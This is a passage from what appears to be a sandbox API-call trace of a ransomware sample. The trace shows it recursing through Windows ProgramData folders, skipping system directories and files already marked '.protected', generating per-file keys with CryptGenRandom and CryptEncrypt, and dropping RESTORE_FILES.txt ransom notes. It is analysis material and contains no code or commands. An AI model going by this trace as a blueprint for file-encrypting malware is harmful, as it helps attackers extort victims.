[0093.125] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.125] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.126] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.126] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RESTORE_FILES.txt") returned 57 [0093.126] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.126] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.126] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.126] lstrcmpiW (lpString1="RSA", lpString2="Windows") returned -1 [0093.126] lstrcmpiW (lpString1="RSA", lpString2="Program Files") returned 1 [0093.126] lstrcmpiW (lpString1="RSA", lpString2="Program Files (x86)") returned 1 [0093.126] lstrcmpiW (lpString1="RSA", lpString2="$Recycle.bin") returned 1 [0093.126] lstrcmpiW (lpString1="RSA", lpString2="System Volume Information") returned -1 [0093.126] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA") returned 43 [0093.126] lstrcmpW (lpString1="RSA", lpString2=".") returned 1 [0093.126] lstrcmpW (lpString1="RSA", lpString2="..") returned 1 [0093.126] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\*") returned 45 [0093.126] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.126] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.126] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.126] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.126] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.126] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.126] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\.") returned 45 [0093.126] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.126] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.126] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.127] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.127] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.127] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.127] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.127] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\..") returned 46 [0093.127] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.127] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.127] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.127] lstrcmpiW (lpString1="MachineKeys", lpString2="Windows") returned -1 [0093.127] lstrcmpiW (lpString1="MachineKeys", lpString2="Program Files") returned -1 [0093.127] lstrcmpiW (lpString1="MachineKeys", lpString2="Program Files (x86)") returned -1 [0093.127] lstrcmpiW (lpString1="MachineKeys", lpString2="$Recycle.bin") returned 1 [0093.127] lstrcmpiW (lpString1="MachineKeys", lpString2="System Volume Information") returned -1 [0093.127] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys") returned 55 [0093.127] lstrcmpW (lpString1="MachineKeys", lpString2=".") returned 1 [0093.127] lstrcmpW (lpString1="MachineKeys", lpString2="..") returned 1 [0093.127] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\*") returned 57 [0093.127] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.127] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.127] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.127] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.127] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.127] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.127] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\.") returned 57 [0093.127] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.127] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.128] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.128] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.128] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.128] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.128] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.128] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\..") returned 58 [0093.128] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.128] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.128] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.128] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.128] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.128] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.128] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.128] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.128] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\RESTORE_FILES.txt") returned 73 [0093.128] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.128] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.128] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.128] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.128] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\RESTORE_FILES.txt") returned 73 [0093.128] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.128] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.128] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.128] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.128] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.128] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.128] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.128] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\RESTORE_FILES.txt") returned 61 [0093.128] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.129] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.129] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.129] lstrcmpiW (lpString1="S-1-5-18", lpString2="Windows") returned -1 [0093.129] lstrcmpiW (lpString1="S-1-5-18", lpString2="Program Files") returned 1 [0093.129] lstrcmpiW (lpString1="S-1-5-18", lpString2="Program Files (x86)") returned 1 [0093.129] lstrcmpiW (lpString1="S-1-5-18", lpString2="$Recycle.bin") returned 1 [0093.129] lstrcmpiW (lpString1="S-1-5-18", lpString2="System Volume Information") returned -1 [0093.129] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18") returned 52 [0093.129] lstrcmpW (lpString1="S-1-5-18", lpString2=".") returned 1 [0093.129] lstrcmpW (lpString1="S-1-5-18", lpString2="..") returned 1 [0093.129] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*") returned 54 [0093.129] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.129] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.129] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.129] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.129] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.129] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.129] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\.") returned 54 [0093.129] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.129] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0093.129] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0093.129] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.129] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.129] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\." (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.129] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.130] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.130] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.130] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.130] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.130] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.130] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\..") returned 55 [0093.130] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.130] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.130] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0093.130] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0093.130] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.130] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.130] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\.." (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.130] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.130] lstrcmpiW (lpString1="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected", lpString2="Windows") returned -1 [0093.130] lstrcmpiW (lpString1="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected", lpString2="Program Files") returned -1 [0093.130] lstrcmpiW (lpString1="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected", lpString2="Program Files (x86)") returned -1 [0093.130] lstrcmpiW (lpString1="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected", lpString2="$Recycle.bin") returned 1 [0093.130] lstrcmpiW (lpString1="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected", lpString2="System Volume Information") returned -1 [0093.130] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected") returned 132 [0093.130] StrStrIW (lpFirst="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected", lpSrch=".protected") returned=".protected" [0093.130] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.130] lstrcmpiW (lpString1="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected", lpString2="Windows") returned -1 [0093.130] lstrcmpiW (lpString1="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected", lpString2="Program Files") returned -1 [0093.130] lstrcmpiW (lpString1="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected", lpString2="Program Files (x86)") returned -1 [0093.130] lstrcmpiW (lpString1="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected", lpString2="$Recycle.bin") returned 1 [0093.130] lstrcmpiW (lpString1="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected", lpString2="System Volume Information") returned -1 [0093.130] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected") returned 132 [0093.130] StrStrIW (lpFirst="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected", lpSrch=".protected") returned=".protected" [0093.130] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.130] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.130] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.130] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.130] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.131] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.131] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\RESTORE_FILES.txt") returned 70 [0093.131] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.131] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.131] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.131] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.131] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\RESTORE_FILES.txt") returned 70 [0093.131] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.131] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.131] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.131] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\RESTORE_FILES.txt") returned 61 [0093.131] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.132] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.132] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.132] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RESTORE_FILES.txt") returned 57 [0093.132] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\crypto\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.133] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.133] lstrcmpiW (lpString1="Device Stage", lpString2="Windows") returned -1 [0093.133] lstrcmpiW (lpString1="Device Stage", lpString2="Program Files") returned -1 [0093.133] lstrcmpiW (lpString1="Device Stage", lpString2="Program Files (x86)") returned -1 [0093.133] lstrcmpiW (lpString1="Device Stage", lpString2="$Recycle.bin") returned 1 [0093.133] lstrcmpiW (lpString1="Device Stage", lpString2="System Volume Information") returned -1 [0093.133] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage") returned 45 [0093.133] lstrcmpW (lpString1="Device Stage", lpString2=".") returned 1 [0093.133] lstrcmpW (lpString1="Device Stage", lpString2="..") returned 1 [0093.133] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\*") returned 47 [0093.133] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.133] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.133] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.133] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.133] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.133] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.133] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\.") returned 47 [0093.133] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.133] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.133] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.133] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.134] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.134] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.134] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.134] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\..") returned 48 [0093.134] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.134] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.134] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.134] lstrcmpiW (lpString1="Device", lpString2="Windows") returned -1 [0093.134] lstrcmpiW (lpString1="Device", lpString2="Program Files") returned -1 [0093.134] lstrcmpiW (lpString1="Device", lpString2="Program Files (x86)") returned -1 [0093.134] lstrcmpiW (lpString1="Device", lpString2="$Recycle.bin") returned 1 [0093.134] lstrcmpiW (lpString1="Device", lpString2="System Volume Information") returned -1 [0093.134] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device") returned 52 [0093.134] lstrcmpW (lpString1="Device", lpString2=".") returned 1 [0093.134] lstrcmpW (lpString1="Device", lpString2="..") returned 1 [0093.134] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\*") returned 54 [0093.134] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.135] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.135] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.135] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.135] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.135] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.135] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\.") returned 54 [0093.135] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.135] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.135] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.135] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.135] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.135] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.135] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.135] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\..") returned 55 [0093.135] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.135] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.135] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.135] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.135] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.135] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.135] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.135] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.135] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\RESTORE_FILES.txt") returned 70 [0093.135] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.135] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.135] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.135] lstrcmpiW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="Windows") returned -1 [0093.135] lstrcmpiW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="Program Files") returned -1 [0093.135] lstrcmpiW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="Program Files (x86)") returned -1 [0093.135] lstrcmpiW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="$Recycle.bin") returned 1 [0093.135] lstrcmpiW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="System Volume Information") returned -1 [0093.135] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}") returned 91 [0093.135] lstrcmpW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2=".") returned 1 [0093.135] lstrcmpW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="..") returned 1 [0093.136] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*") returned 93 [0093.136] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.136] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.136] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.136] lstrcmpiW 